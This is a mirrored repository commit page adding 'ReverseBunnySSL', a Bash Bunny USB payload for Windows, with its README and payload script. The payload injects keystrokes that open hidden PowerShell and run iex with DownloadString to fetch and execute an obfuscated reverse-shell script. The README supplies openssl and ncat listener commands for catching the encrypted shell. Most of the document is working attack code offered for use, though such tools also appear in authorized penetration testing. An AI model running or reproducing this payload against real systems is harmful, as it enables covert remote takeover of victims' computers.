hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Uploaded ReverseBunnySSL

Browse Source
This commit is contained in:
0iphor13 2022-05-08 13:24:35 +02:00 committed by GitHub
parent eb5600aeab
commit 86c1523a77
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 75 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
payloads/library/remote_access/ReverseBunnySSL/RBSSL.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

30
payloads/library/remote_access/ReverseBunnySSL/README.md Normal file
View File

@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!!!Insert the IP of your attacking machine & PORT into the payload!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.jpg)

BIN
payloads/library/remote_access/ReverseBunnySSL/Startscreen.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

44
payloads/library/remote_access/ReverseBunnySSL/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0iphor13
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH